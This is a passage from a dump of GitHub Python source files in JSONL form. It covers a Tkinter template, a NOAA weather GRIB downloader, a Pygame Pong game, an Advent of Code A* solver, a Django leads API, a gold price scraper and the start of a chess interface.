global InputDirBtn\n InputDirBtn = Button(text='Выбор', command=SelectDir)\n #InputDirBtn.place(x=20, y=54, height=20)\n InputDirBtn.place(x=150, y=31, height=20)\n\ndef BtnCmd():\n print('btn pressed')\n Test(Tkinter.Tk(\"test\"))\n\n\ndef SelectDir():\n global InputDir\n\n InputDir = \"\"\n InputDir = filedialog.askdirectory(title='Выберите папку на обработку')\n if InputDir:\n InputDirEntry.configure(state = NORMAL)\n InputDirEntry.delete(0,END)\n InputDirEntry.insert(0,str(InputDir))\n InputDirEntry.configure(state = DISABLED)\n print('IDC: InputDir : {0}'.format(InputDir))\n else:\n print('IDC: InputFile not selected')\n\n\n\n\n\n\n\n\ndef UserSelector():\n top = Toplevel()\n scrnw = (root.winfo_screenwidth()//2) - scrnwparam\n scrnh = (root.winfo_screenheight()//2) - scrnhparam\n top.geometry('180x100+{}+{}'.format(scrnw, scrnh))\n\n top.title(\"toplevel\")\n \n Btn1 = Button(top, text='Выбор', command=UserSelector)\n #InputDirBtn.place(x=20, y=54, height=20)\n Btn1.place(x=10, y=10, height=20)\n\n\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"albertkovach/Python","sub_path":"templates/toplevel/toplevel.py","file_name":"toplevel.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12057571954","text":"import argparse\nimport datetime as dt\nimport logging\nimport math\nimport os.path\nimport time\nimport sys\nimport tempfile\n\nimport requests\n\n\nclass DataProduct:\n \"\"\"A representation of NOAA weather data product, able to make requests for data.\"\"\"\n def __init__(self, description, base_url, dir_fn, file_fn,\n out_prefix, interval, levels, variables):\n self.description = description\n self.base_url = base_url\n self.dir_fn = dir_fn\n self.file_fn = file_fn\n self.out_prefix = out_prefix\n self.interval = interval\n self.levels = levels\n self.variables = variables\n\n def _make_params(self, forecast_time, forecast_hour, args):\n \"\"\"Constructs a URL paramater dictionary for the requested forecast time and an hour in\n that forecast.\"\"\"\n basics = {\n 'file': self.file_fn(forecast_time, forecast_hour),\n 'dir': self.dir_fn(forecast_time),\n 'subregion': '',\n 'leftlon': args.min_lon,\n 'rightlon': args.max_lon,\n 'toplat': args.max_lat,\n 'bottomlat': args.min_lat,\n }\n levels = {'lev_{}'.format(l): 'on' for l in self.levels}\n variables = {'var_{}'.format(v): 'on' for v in self.variables}\n return {**basics, **levels, **variables}\n\n def request_forecast(self, forecast_time, forecast_hour, args):\n \"\"\"Requests the URL for the requested time and forecast, printing an info message\n beforehand.\"\"\"\n logging.info('Requesting %s data for %s, forecast hour %d', self.out_prefix,\n forecast_time.strftime('%Y%m%d %HZ'), forecast_hour)\n return requests.get(self.base_url,\n params=self._make_params(forecast_time, forecast_hour, args))\n\n def get_most_recent_cycle_time(self):\n \"\"\"Returns the most recent UTC datetime who's hour is a multiple of the interval.\"\"\"\n cycle_time = dt.datetime.utcnow()\n hour = self.interval * math.floor(cycle_time.hour / self.interval)\n return cycle_time.replace(hour=hour, minute=0, second=0, microsecond=0)\n\n def get_previous_cycle_time(self, cycle_time):\n \"\"\"Returns a UTC datetime one interval before the supplied datatime.\"\"\"\n return cycle_time - dt.timedelta(hours=self.interval)\n\n def filename(self, forecast_time):\n \"\"\"Returns a convenient string for the supplied forecast datetime.\"\"\"\n return forecast_time.strftime(self.out_prefix + '_%Y%m%d_%Hz.grb2')\n\n\nPRODUCTS = {\n 'GFS': DataProduct(\n description='NCEP Global Forecast System at 0.25° resolution',\n base_url=r'https://nomads.ncep.noaa.gov/cgi-bin/filter_gfs_0p25.pl',\n dir_fn=lambda time: r'/gfs.{}/{:02d}/atmos'.format(time.strftime('%Y%m%d'), time.hour),\n file_fn=lambda time, hour: r'gfs.t{:02d}z.pgrb2.0p25.f{:03d}'.format(time.hour, hour),\n out_prefix=r'gfs_0p25',\n interval=6,\n levels=[\n 'surface',\n 'mean_sea_level',\n '2_m_above_ground', # Used for air temperature\n '10_m_above_ground', # Used for surface wind\n 'entire_atmosphere', # Used for cloud cover\n '500_mb',\n ],\n variables=[\n 'UGRD', # U component of wind\n 'VGRD', # V component of wind\n 'GUST', # Wind gust\n 'PRMSL', # Pressure (for surface) [Not available in HRRR]\n 'HGT', # Geopotential height (for 500mb)\n 'TMP', # Temperature\n 'PRATE', # Precipitation rate\n 'VIS', # Visibility\n 'TCDC', # Total cloud cover\n ]),\n 'GFSwavewcoast': DataProduct(\n description='NCEP GFS based waves for West Coast',\n base_url=r'https://nomads.ncep.noaa.gov/cgi-bin/filter_gfswave.pl',\n dir_fn=lambda time: r'/gfs.{}/{:02d}/wave/gridded'.format(\n time.strftime('%Y%m%d'), time.hour),\n file_fn=lambda time, hour: r'gfswave.t{:02d}z.wcoast.0p16.f{:03d}.grib2'.format(\n time.hour, hour),\n out_prefix=r'wave_wcoast_0p16',\n interval=6,\n levels=['surface'],\n variables=[\n 'HTSGW', # Significant wave height\n 'WVDIR', # Wind wave direction\n 'WVPER', # Wind wave period\n ]),\n # Unfortunately HRRR isn't usable yet. zxgrib entirely fails to display any grib from HRRR\n # while OpenCPN displays moderately beleivable data but on the wrong place on the map.\n 'HRRR': DataProduct(\n description='NCEP High Resolution Rapid Refresh for continental US',\n base_url=r'https://nomads.ncep.noaa.gov/cgi-bin/filter_hrrr_2d.pl',\n dir_fn=lambda time: r'/hrrr.{}/conus'.format(time.strftime('%Y%m%d')),\n file_fn=lambda time, hour: r'hrrr.t{:02d}z.wrfsfcf{:02d}.grib2'.format(time.hour, hour),\n out_prefix=r'hrrr_conus',\n interval=1,\n levels=[\n 'surface',\n 'mean_sea_level',\n '2_m_above_ground', # Used for air temperature\n '10_m_above_ground', # Used for surface wind\n 'entire_atmosphere', # Used for cloud cover\n '500_mb',\n ],\n variables=[\n 'UGRD', # U component of wind\n 'VGRD', # V component of wind\n 'GUST', # Wind gust\n #'PRMSL', # Pressure (for surface) [Not available in HRRR]\n 'HGT', # Geopotential height (for 500mb)\n 'TMP', # Temperature\n 'PRATE', # Precipitation rate\n 'VIS', # Visibility\n 'TCDC', # Total cloud cover\n ]),\n}\n\n\ndef create_parser():\n \"\"\"Creates the definition of the expected command line flags.\"\"\"\n\n class SmartFormatter(argparse.HelpFormatter):\n \"\"\"Trivial formatter to wrap strings beginning with `R|` using their embedded line feeds.\"\"\"\n def _split_lines(self, text, width):\n if text.startswith('R|'):\n return text[2:].splitlines()\n # this is the RawTextHelpFormatter._split_lines\n return argparse.HelpFormatter._split_lines(self, text, width)\n\n parser = argparse.ArgumentParser(\n description='Script to collect NOAA GRIB data for only interesting variables and a limited '\n 'geographical range',\n epilog='Copyright Jody Sankey 2022',\n formatter_class=SmartFormatter)\n parser.add_argument('-o', '--output_dir', action='store', metavar='DIR',\n default=tempfile.gettempdir(), help=\"Directory for output file.\")\n parser.add_argument('-p', '--product', action='append', choices=PRODUCTS.keys(),\n help=\"R|NWS products to fetch:\\n\" +\n \"\\n\".join([' {} - {}'.format(k, PRODUCTS[k].description)\n for k in PRODUCTS]) +\n \"\\nMay be supplied multiple times for multiple products.\")\n parser.add_argument('-d', '--duration', action='store', default=48, type=int, metavar='HOURS',\n help=\"Time range to collect (this range starts at model run time, not \"\n \"current time).\")\n parser.add_argument('-i', '--interval', action='store', default=1, type=int, metavar='HOURS',\n help=\"Number of hours between collected datasets.\")\n parser.add_argument('-s', '--sleep', action='store', default=500, type=int, metavar='MS',\n help=\"Number of milliseconds to sleep between requests to avoid DoS.\")\n parser.add_argument('--min_lat', action='store', default=34, type=int, metavar='DEGREES',\n help=\"Minimum latitude to collect data for, positive for North.\")\n parser.add_argument('--max_lat', action='store', default=41, type=int, metavar='DEGREES',\n help=\"Maximum latitude to collect data for, positive for North.\")\n parser.add_argument('--min_lon', action='store', default=-127, type=int, metavar='DEGREES',\n help=\"Minimum longitude to collect data for, positive for East.\")\n parser.add_argument('--max_lon', action='store', default=-120, type=int, metavar='DEGREES',\n help=\"Maximum longitude to collect data for, positive for East.\")\n parser.add_argument('-q', '--quiet', action='store_true',\n help=\"Don't print output for successful operations.\")\n parser.add_argument('--after', action='store', metavar='FILE',\n help=\"Output filename which new data must be later than.\")\n return parser\n\n\ndef main():\n \"\"\"Executes the script using command line arguments.\"\"\"\n args = create_parser().parse_args()\n log_level = logging.WARN if args.quiet else logging.INFO\n logging.basicConfig(format='%(message)s', level=log_level)\n\n\n product_names = args.product if args.product else ['GFS']\n for product in [PRODUCTS[name] for name in product_names]:\n forecast_time = product.get_most_recent_cycle_time()\n resp = product.request_forecast(forecast_time, 0, args)\n\n # If the server doesn't have this most recent time yet, backoff to the previous time\n if resp.status_code == 404:\n logging.info('Not found, backing off one interval')\n forecast_time = product.get_previous_cycle_time(forecast_time)\n resp = product.request_forecast(forecast_time, 0, args)\n\n # If neither succeeded just quit.\n if resp.status_code != 200:\n sys.exit('HTTP response code {}'.format(resp.status_code))\n\n # If an after argument was supplied (usually from the previous run) check the time we've\n # found is actually later. If not then just quit.\n filename = product.filename(forecast_time)\n if args.after and filename <= args.after:\n logging.info('Data at %s was not after %s. Quitting.', filename, args.after)\n return\n\n # Write this first response and a set of additional forecast hours to file.\n filepath = os.path.join(args.output_dir, filename)\n with open(filepath, 'wb') as file:\n file.write(resp.content)\n for forecast_hour in range(1, args.duration, args.interval):\n resp = product.request_forecast(forecast_time, forecast_hour, args)\n if resp.status_code != 200:\n sys.exit('HTTP response code {}'.format(resp.status_code))\n file.write(resp.content)\n time.sleep(args.sleep / 1000.0)\n logging.info('Wrote %s', filepath)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jodysankey/scripts","sub_path":"nws_grib.py","file_name":"nws_grib.py","file_ext":"py","file_size_in_byte":10589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1648046601","text":"from os.path import join, abspath, pardir, dirname\nfrom sys import path\nparent_dir = abspath(join(dirname(abspath(__file__)), pardir))\npath.append(parent_dir)\nfrom common.utils import *\n\ndef get_parent(par_dir):\n prefix = join(abspath(join(parent_dir, pardir)), \"data\") \n path = join(prefix, \"events\", par_dir)\n create_if_not_exists(path)\n return path\n","repo_name":"mohammadzainabbas/BDM","sub_path":"src/collectors/event/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39542953544","text":"import pygame, sys\r\nfrom pygame.locals import *\r\nimport math, random\r\n# Sets the colors that are used later for the triangles\r\nRED = (255, 0, 0)\r\nBLUE = (0,0,255)\r\nDARKRED = (192,0,0)\r\nGREEN = (0, 150, 0)\r\nBLACK = (0, 0, 0)\r\nYELLOW = (255, 215, 0)\r\nWHITE = (255, 255, 255)\r\nORANGE = (255,165,0)\r\nPURPLE = (128,0,128)\r\nTEAL = (86,237,253)\r\n\r\nhSize = 600\r\nvSize = 400\r\n\r\n# Initiates the window size for pygame\r\nWINDOW = pygame.display.set_mode((hSize, vSize), 0, 32)\r\ndef myDrawing(x,y,dx5,dy5):\r\n # Change x and y to move but we need to pass them back out\r\n x += dx5\r\n y += dy5\r\n\r\n boundingRect = pygame.Rect(x, y, hSize // 25, vSize // 20)\r\n pygame.draw.rect(WINDOW,WHITE,boundingRect)\r\n return boundingRect,x,y\r\n# Control Moving\r\nrectSize = 20\r\nmyRect = pygame.Rect(hSize//1.08,vSize//2,rectSize,vSize//4) #RED\r\nmyRect2 = pygame.Rect(hSize//30,vSize//2,rectSize,vSize//4) #BLUE\r\ndx,dy = 0,0\r\ndx2,dy2 = 0,0\r\nspeed = 10\r\n\r\ndef main():\r\n # Sets the caption for the window\r\n pygame.display.set_caption(\"Our first moving shapes\")\r\n # Initiates PyGame\r\n pygame.init()\r\n score1 = -1\r\n score2 = -1\r\n x = hSize//2\r\n y = vSize//3\r\n dx5 = 4\r\n dy5 = 2\r\n # Set up a clock\r\n timer = pygame.time.Clock()\r\n pygame.key.set_repeat(100, 50)\r\n while True:\r\n timer.tick(60)\r\n dx, dy, dx2, dy2 = 0, 0, 0, 0\r\n for event in pygame.event.get():\r\n keys = pygame.key.get_pressed()\r\n # if keys[pygame.K_LEFT]:\r\n # dx = -speed\r\n # elif keys[pygame.K_RIGHT]:\r\n # dx = speed\r\n if keys[pygame.K_UP]:\r\n dy = -speed\r\n elif keys[pygame.K_DOWN]:\r\n dy = speed\r\n if keys[pygame.K_w]:\r\n dy2 = -speed\r\n elif keys[pygame.K_s]:\r\n dy2 = speed\r\n # if keys[pygame.K_a]:\r\n # dx2 = -speed\r\n # elif keys[pygame.K_d]:\r\n # dx2 = speed\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if myRect.left < 0:\r\n myRect.left, dx = 0, 0\r\n elif myRect.right > hSize:\r\n myRect.right, dx = hSize, 0\r\n if myRect.top < 0:\r\n myRect.top, dy = 0, 0\r\n elif myRect.bottom > vSize:\r\n myRect.bottom, dy = vSize, 0\r\n if myRect2.left < 0:\r\n myRect2.left, dx2 = 0, 0\r\n elif myRect2.right > hSize:\r\n myRect2.right, dx2 = hSize, 0\r\n if myRect2.top < 0:\r\n myRect2.top, dy2 = 0, 0\r\n elif myRect2.bottom > vSize:\r\n myRect2.bottom, dy2 = vSize, 0\r\n\r\n myRect.move_ip(dx, dy) # Move the rectangle\r\n myRect2.move_ip(dx2, dy2) # Move the rectangle\r\n WINDOW.fill(RED)\r\n # Drawing rectangles\r\n backOne = pygame.Rect(hSize // 2, vSize//1000, hSize, vSize)\r\n pygame.draw.rect(WINDOW, BLUE, backOne)\r\n # Fill the screen with a color\r\n # Updates the screen\r\n boundingRect,x,y = myDrawing(x,y,dx5,dy5)\r\n if boundingRect.top<=0 or boundingRect.bottom>=vSize:\r\n dy5*=-1\r\n if boundingRect.left<=0:\r\n x= hSize//2\r\n y= vSize//2\r\n score1+=1\r\n if boundingRect.right>=hSize:\r\n x = hSize // 2\r\n y = vSize // 2\r\n score2+=1\r\n\r\n if myRect.colliderect(boundingRect):\r\n dx5*=-1\r\n dy5*=1\r\n elif myRect2.colliderect(boundingRect):\r\n dx5*=-1\r\n dy5*=1\r\n else:\r\n pygame.draw.rect(WINDOW, RED, myRect) # Draw the rectangle\r\n pygame.draw.rect(WINDOW, BLUE, myRect2) # Draw the rectangle\r\n\r\n # Text\r\n myfont = pygame.font.SysFont('Comic Sans MS', 30)\r\n textsurface = myfont.render(str(score1), False, (0, 0, 0))\r\n textsurface2 = myfont.render(str(score2), False, (0, 0, 0))\r\n WINDOW.blit(textsurface, (hSize//3.35, 0))\r\n WINDOW.blit(textsurface2, (hSize // 1.5, 0))\r\n\r\n # Rules and Instructions\r\n if score1 == -1:\r\n dx5, dy5 = 0, 0\r\n WINDOW.fill(BLUE)\r\n textsurface6 = myfont.render(\"Game: Classic Pong\", False, BLACK)\r\n WINDOW.blit(textsurface6, (hSize // 3.5, vSize // 12))\r\n textsurface3 = myfont.render(\"RULES: Use your paddle to hit the ball to\", False, TEAL)\r\n WINDOW.blit(textsurface3, (hSize // 50, vSize // 4))\r\n textsurface5 = myfont.render(\"the other players side of the screen.\", False, TEAL)\r\n WINDOW.blit(textsurface5, (hSize // 50, vSize // 3))\r\n textsurface7 = myfont.render(\"Player 1: Use w and s to move up and down.\", False, BLACK)\r\n WINDOW.blit(textsurface7, (hSize // 50, vSize // 2.2))\r\n textsurface8 = myfont.render(\"Player 2: Use arrows to move up and down.\", False, BLACK)\r\n WINDOW.blit(textsurface8, (hSize // 50, vSize // 1.8))\r\n textsurface8 = myfont.render(\"FIRST PLAYER TO 10 POINTS WINS!!!\", False, TEAL)\r\n WINDOW.blit(textsurface8, (hSize // 50, vSize // 1.4))\r\n textsurface4 = myfont.render(\"Press Backspace to play!!\", False, RED)\r\n WINDOW.blit(textsurface4, (hSize // 5, vSize // 1.2))\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_BACKSPACE]:\r\n score1, score2 = 0, 0\r\n dx5, dy5 = 4, 2\r\n\r\n # Wins and loses\r\n if score1 == 10:\r\n dx5,dy5 =0,0\r\n WINDOW.fill(BLUE)\r\n textsurface3 = myfont.render(\"Player Two Wins\", False, RED)\r\n WINDOW.blit(textsurface3, (hSize//3, vSize//4))\r\n textsurface4 = myfont.render(\"Press Backspace to play again\", False, RED)\r\n WINDOW.blit(textsurface4, (hSize // 5, vSize // 2))\r\n if keys[pygame.K_BACKSPACE]:\r\n score1,score2=0,0\r\n dx5,dy5=4,2\r\n if score2 == 10:\r\n dx5,dy5=0,0\r\n WINDOW.fill(RED)\r\n textsurface3 = myfont.render(\"Player One Wins\", False, BLUE)\r\n WINDOW.blit(textsurface3, (hSize//3, vSize//4))\r\n textsurface4 = myfont.render(\"Press Backspace to play again\", False, BLUE)\r\n WINDOW.blit(textsurface4, (hSize // 5, vSize // 2))\r\n if keys[pygame.K_BACKSPACE]:\r\n score1,score2=0,0\r\n dx5,dy5=4,2\r\n pygame.display.update()\r\n\r\nmain()","repo_name":"KeeanBenjamin/PingPong","sub_path":"PongGame.py","file_name":"PongGame.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23098348771","text":"import heapq\nfrom itertools import product\n\n\ndef show(risk, tx, ty):\n\n for j in range(ty+2):\n row = []\n for i in range(tx+2):\n s = {0: '.', 1: '=', 2: '|'}\n if (i, j) == (0, 0):\n row.append('M')\n elif (i, j) == (tx, ty):\n row.append('T')\n else:\n row.append(s[risk[(i, j)]])\n print(''.join(row))\n\n\ndef build_cave(depth, tx, ty):\n\n geologic = {}\n erosion = {}\n\n EXTRA_SIZE = 100\n\n for i in range(tx + EXTRA_SIZE):\n geologic[(i, 0)] = i * 16807\n erosion[(i, 0)] = (geologic[(i, 0)] + depth) % 20183\n\n for j in range(ty + EXTRA_SIZE):\n geologic[(0, j)] = j * 48271\n erosion[(0, j)] = (geologic[(0, j)] + depth) % 20183\n\n for i, j in product(range(1, tx+EXTRA_SIZE), range(1, ty+EXTRA_SIZE)):\n geologic[(i, j)] = erosion[(i-1, j)] * erosion[(i, j-1)]\n erosion[(i, j)] = (geologic[(i, j)] + depth) % 20183\n\n geologic[(0, 0)] = 0\n geologic[(tx, ty)] = 0\n erosion[(0, 0)] = 0\n erosion[(tx, ty)] = 0\n\n risk = {k: v % 3 for k, v in erosion.items()}\n\n return risk\n\n\nclass AStar:\n\n def __init__(self, cave, target):\n\n self.target = target\n self.graph = cave\n\n self.max_x = max(x[0] for x in cave)\n self.max_y = max(x[1] for x in cave)\n\n self.best_cost = {((0, 0), 'torch'): 0}\n self.neighbors = [(0, ((0, 0), 'torch'))]\n self.visited = set()\n\n def search(self):\n\n while self.neighbors:\n\n t, next_node = heapq.heappop(self.neighbors)\n if t >= self.best_cost.get(self.target, 9E99):\n break\n if next_node in self.visited:\n continue\n self._visit_node(next_node)\n\n return self.best_cost[self.target]\n\n def _visit_node(self, node):\n\n self.visited.add(node)\n\n (nx, ny), tool = node\n\n # neighbors by walking\n for _x, _y in [(-1, 0), (1, 0), (0, 1), (0, -1)]:\n x = nx + _x\n y = ny + _y\n\n if any([(x < 0), (y < 0), (x >= self.max_x), (y >= self.max_y)]):\n continue\n\n # right tool for da job?\n risk = self.graph[(x, y)]\n\n if tool == 'none' and risk == 0:\n continue\n if tool == 'torch' and risk == 1:\n continue\n if tool == 'climbing' and risk == 2:\n continue\n\n g = self.best_cost[node] + 1\n h = self._heuristic(x, y)\n t = g + h\n\n self.best_cost[((x, y), tool)] = min(g, self.best_cost.get(((x, y), tool), 9E99))\n\n state = ((x, y), tool)\n if state not in self.visited:\n new_node = (t, state)\n heapq.heappush(self.neighbors, new_node)\n\n # neighbors by switching tool\n risk = self.graph[(nx, ny)]\n for new_tool in ['none', 'torch', 'climbing']:\n\n if new_tool == tool:\n continue\n if new_tool == 'none' and risk == 0:\n continue\n if new_tool == 'torch' and risk == 1:\n continue\n if new_tool == 'climbing' and risk == 2:\n continue\n\n g = self.best_cost[node] + 7\n h = self._heuristic(x, y)\n t = g + h\n\n self.best_cost[((nx, ny), new_tool)] = min(g, self.best_cost.get(((nx, ny), new_tool), 9E99))\n\n state = ((nx, ny), new_tool)\n if state not in self.visited:\n new_node = (t, state)\n heapq.heappush(self.neighbors, new_node)\n\n def _heuristic(self, x, y):\n return self.max_x - x + self.max_y - y\n\n\ndef solve(depth, tx, ty):\n\n cave = build_cave(depth, tx, ty)\n\n target = ((tx, ty), 'torch')\n a = AStar(cave, target)\n solution = a.search()\n\n show(cave, tx, ty)\n return solution\n\n\ndef main():\n\n with open(\"input\") as in_f:\n d = int(in_f.readline().strip().split()[-1])\n tx, ty = map(int, in_f.readline().strip().split()[-1].split(','))\n\n solution = solve(d, tx, ty)\n\n print(solution)\n\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"carrdelling/AdventOfCode2018","sub_path":"p22/gold.py","file_name":"gold.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31428366722","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom .models import Lead, Agent, User\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializers import LeadSerializer, LeadSerializerAll\nfrom django.db.models import Q\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAdminUser, IsAuthenticated\n\n\n\n\nclass LeadView(APIView):\n \n\n def get(self, request):\n \n queryset = Lead.objects.filter(\n Q(claimed=None)\n or Q(claimed=\"\")\n ).all()\n serialized = LeadSerializer(queryset, many=True)\n\n return Response(\n serialized.data,\n status=status.HTTP_302_FOUND\n )\n\n def post(self, request):\n \n try:\n data = LeadSerializer(data=request.data)\n except Exception as err:\n return Response(\n {\n \"error\": str(err)\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n\n if data.is_valid():\n data.save()\n return Response(\n data.data,\n status=status.HTTP_201_CREATED\n )\n else:\n return Response(\n {\n \"error\": str(data.errors)\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n\n\nclass AgentView(APIView):\n \n authentication_classes = [SessionAuthentication, BasicAuthentication]\n permission_classes = [IsAuthenticated]\n\n def get(self, request, id):\n \n agent = Agent.objects.filter(user=request.user).first()\n try:\n lead = Lead.objects.filter(\n (Q(claimed=None) or Q(claimed=agent)) and Q(id=id)).first()\n lead_serialized = LeadSerializerAll(lead)\n except Lead.DoesNotExist:\n return Response(\n {\n \"error\": \"Lead claimed.\"\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n return Response(\n lead_serialized.data,\n status=status.HTTP_202_ACCEPTED\n )\n\n def post(self, request, id: int):\n \n agent = Agent.objects.filter(user=request.user).first()\n try:\n lead = Lead.objects.get(pk=id)\n except Lead.DoesNotExist:\n return Response(\n {\n \"error\": \"The lead does not exist.\"\n },\n status=status.HTTP_204_NO_CONTENT\n )\n if not lead.claimed:\n lead.claime = agent\n lead.save()\n serialized = LeadSerializerAll(lead)\n\n return Response(\n serialized.data,\n status=status.HTTP_202_ACCEPTED\n )\n elif lead.claimed != agent:\n return Response(\n {\n \"error\": \"Lead claimed.\"\n },\n status=status.HTTP_306_RESERVED\n )\n elif lead.claimed == agent:\n return Response(\n {\n \"error\": \"This has been claimed already.\"\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n","repo_name":"Rads059/CRM","sub_path":"form/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38862439959","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport argparse\nimport pickle\n\nimport _init_paths\n# sys.path.append(\"/home/josep/code/python/rlcode/robovat\")\nfrom obs_handler import ObservationHandler\n\n\nclass SampleVisualizer(object):\n\n def __init__(self, samples_dir):\n if not os.path.exists(samples_dir):\n print(\"Sample directory does not exist.\")\n exit(-1)\n elif not os.path.isdir(samples_dir):\n print(samples_dir + \" is not a directory.\")\n exit(-1)\n\n dirs = [samples_dir + '/' + _ for _ in os.listdir(samples_dir)]\n self.files = []\n for d in dirs:\n self.files.extend([d + '/' + _ for _ in os.listdir(d)])\n\n self.show_idx = 0\n self.plotter = ObservationHandler()\n\n def show_next(self):\n with open(self.files[self.show_idx], 'rb') as f:\n data = pickle.load(f)\n observation, pick_place = data[0], data[1]\n grasp = pick_place[0]\n self.plotter.plot([observation['depth'],\n observation['rgb'],\n observation['segmask']],\n grasp\n )\n self.plotter.show()\n self.show_idx += 1\n f.close()\n\n def show_all(self):\n while self.show_idx < len(self.files):\n self.show_next()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--sample_dir\", type=str, help=\"Directory of samples.\")\n args = parser.parse_args()\n\n v = SampleVisualizer(args.sample_dir)\n v.show_all()\n","repo_name":"JosepLeder/CLKRobovat","sub_path":"tools/sample_visualizer.py","file_name":"sample_visualizer.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"42301677661","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 27 20:02:18 2018\n\n@author: Santosh Bag\n\"\"\"\n\nimport sys\nimport requests\nimport datetime #import date, timedelta\nfrom pandas import DataFrame\nfrom bs4 import BeautifulSoup\n\nimport mrigutilities\n\ndef gold_download():\n print(\"Gold Rates download started\", end =\" \")\n engine = mrigutilities.sql_engine()\n \n url = 'https://www.gold.org/data/gold-price'\n \n s = requests.Session()\n response = s.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n \n today = datetime.date.today()\n \n price_table = soup.find_all(class_='mid')\n \n #price = price_table[0].find_all(class_='value')[0].text.replace(\",\",\"\")\n price = price_table[0].text.replace(\",\",\"\")\n date = soup.find_all(class_='timestamp')[0].text.split(\",\")[0]\n date = datetime.datetime.strptime(date,'%d %B %Y').date()\n #print(price)\n #print(date)\n sql = \"INSERT INTO gold_prices (value_date, price, download_date) VALUES ( '\"\\\n +date.strftime('%Y-%m-%d')+\"','\"\\\n +price+\"','\"\\\n +today.strftime('%Y-%m-%d')+\"')\"\n engine.execute(sql)\n print(\"Gold Rates download finished\\n\")\n \nif __name__ == '__main__':\n gold_download()","repo_name":"santoshbag/mrigAnalytics","sub_path":"old/goldprice.py","file_name":"goldprice.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"3553333318","text":"import sys\r\nsys.path.append(\"..\")\r\nfrom Motor.Juego import *\r\nfrom Interfaz import Opciones\r\nfrom Interfaz import Archivos\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\n\r\ndef borrarEventos():\r\n pygame.event.set_blocked(pygame.ACTIVEEVENT)\r\n pygame.event.set_blocked(pygame.KEYDOWN)\r\n pygame.event.set_blocked(pygame.KEYUP)\r\n pygame.event.set_blocked(pygame.MOUSEMOTION)\r\n pygame.event.set_blocked(pygame.MOUSEBUTTONUP)\r\n #pygame.event.set_blocked(pygame.MOUSEBUTTONDOWN)\r\n pygame.event.set_blocked(pygame.JOYAXISMOTION)\r\n pygame.event.set_blocked(pygame.JOYBALLMOTION)\r\n pygame.event.set_blocked(pygame.JOYHATMOTION)\r\n pygame.event.set_blocked(pygame.JOYBUTTONUP)\r\n pygame.event.set_blocked(pygame.JOYBUTTONDOWN)\r\n pygame.event.set_blocked(pygame.VIDEORESIZE)\r\n pygame.event.set_blocked(pygame.VIDEOEXPOSE)\r\n pygame.event.set_blocked(pygame.USEREVENT)\r\n\r\n\r\ndef dibujarPantalla(juego, screen):\r\n\r\n screen.blit(juego.fondoPantalla, (0, 0))\r\n\r\n for fila in juego.tablero.casillas:\r\n for casilla in fila:\r\n if not (casilla.fila == 0 or casilla.columna == 0):\r\n screen.blit(casilla.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (casilla.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - casilla.fila)))\r\n #Dibujado de la pieza que ocupa la casilla\r\n if casilla.pieza is not None:\r\n if casilla.pieza.activo:\r\n screen.blit(casilla.pieza.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (casilla.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - casilla.fila)))\r\n\r\n pygame.display.flip()\r\n\r\n\r\ndef dibujarMovimiento(juego, screen, jugada):\r\n\r\n #Casilla Origen\r\n casillaOr = juego.tablero.casillas[jugada[0][0]][jugada[0][1]]\r\n #CasillaDestino\r\n casillaDes = juego.tablero.casillas[jugada[1][0]][jugada[1][1]]\r\n\r\n for paso in range(0,Opciones.TamanoCuadro + 1,1):\r\n\r\n pygame.time.wait(5)\r\n\r\n for fila in juego.tablero.casillas:\r\n for casilla in fila:\r\n if not (casilla.fila == 0 or casilla.columna == 0):\r\n screen.blit(casilla.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (casilla.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - casilla.fila)))\r\n # Dibujado de la piezas fijas que ocupan las casillas\r\n if casilla.pieza is not None:\r\n if casilla.pieza.activo:\r\n if not casilla.pieza == casillaDes.pieza:\r\n screen.blit(casilla.pieza.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (casilla.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - 